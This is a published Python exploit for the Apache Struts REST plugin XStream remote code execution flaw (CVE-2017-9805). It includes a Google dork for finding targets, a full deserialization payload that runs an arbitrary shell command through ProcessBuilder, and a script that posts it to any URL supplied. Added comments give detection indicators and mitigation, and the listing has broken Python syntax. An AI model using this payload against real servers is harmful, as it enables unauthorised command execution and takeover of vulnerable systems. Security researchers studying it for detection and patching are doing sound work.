
Apache Struts 2.5.12 XStream Remote Code Execution

2017-09-07 00:00:00
Warflop
packetstormsecurity.com

`# Exploit Title: Struts 2.5 - 2.5.12 REST Plugin XStream RCE  
# Google Dork: filetype:action  
# Date: 06/09/2017  
# Exploit Author: Warflop  
# Vendor Homepage: https://struts.apache.org/  
# Software Link: http://mirror.nbtelecom.com.br/apache/struts/2.5.10/struts-2.5.10-all.zip  
# Version: Struts 2.5 to Struts 2.5.12  
# Tested on: Struts 2.5.10  
# CVE : 2017-9805  
  
#!/usr/bin/env python3  
# coding=utf-8  
# *****************************************************  
# Struts CVE-2017-9805 Exploit  
# Warflop (http://securityattack.com.br/)  
# Greetz: Pimps & G4mbl3r  
# *****************************************************  
import requests  
import sys  
  
# Build the XStream object graph below and POST it to the URL in sys.argv[1].
#
# Defender's reading of this listing (code left as published; notes only):
# - The XML is the serialized object graph that the Struts REST plugin's
#   XStream handler rebuilds for a request carrying
#   Content-Type: application/xml. Its innermost element is a
#   java.lang.ProcessBuilder whose <command> is /bin/sh -c <command>, and the
#   ImageIO$ContainsFilter entry names ProcessBuilder.start as the method
#   to invoke; the surrounding CipherInputStream / FilterIterator /
#   NativeString wrappers only exist so that call is reached while the
#   graph is being deserialized.
# - Detection: XML request bodies to Struts REST endpoints that contain
#   class names such as java.lang.ProcessBuilder,
#   javax.crypto.CipherInputStream or
#   jdk.nashorn.internal.objects.NativeString are a high-confidence
#   indicator; the affected range is the one given in the header comment.
# - Mitigation: run a release outside the affected range given in the
#   header (as I recall the vendor fix restricts the types XStream may
#   instantiate -- confirm against the advisory for this CVE), or disable
#   the REST plugin's XML handler where it is not needed.
#
# Args:
#   command: shell command spliced verbatim into the XML below. It is not
#       XML-escaped, so '<', '&' or quotes in it yield a malformed body.
# Returns:
#   None; the HTTP response body is printed.
def exploration(command):

# Payload template; `command` is interpolated into the <string> element
# of the ProcessBuilder argument list (see the /bin/sh -c line).
exploit = '''
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>/bin/sh</string><string>-c</string><string>'''+ command +'''</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer/>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
'''


# Target is taken from argv inside the function rather than passed as a
# parameter; the caller only supplies the command.
url = sys.argv[1]

# Content-Type: application/xml is what routes the body to the REST
# plugin's XStream handler; the User-Agent is cosmetic.
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0',
'Content-Type': 'application/xml'}

request = requests.post(url, data=exploit, headers=headers)
# NOTE(review): Python 2 print statement despite the python3 shebang; the
# listing as published is not valid Python 3.
print request.text
  
# Command-line entry point: fewer than two arguments prints usage and exits,
# otherwise exploration() is called with argv[2] as the command (argv[1],
# the URL, is read inside exploration()).
# NOTE(review): this check runs at module top level, so it also fires on
# import; there is no __main__ guard.
if len(sys.argv) < 3:
print ('CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE')
print ('[*] Warflop - http://securityattack.com.br')
print ('[*] Greatz: Pimps & G4mbl3r')
print ('[*] Use: python struts2.py URL COMMAND')
print ('[*] Example: python struts2.py http://sitevulnerable.com/struts2-rest-showcase/orders/3 id')
exit(0)
else:
exploration(sys.argv[2])
  
`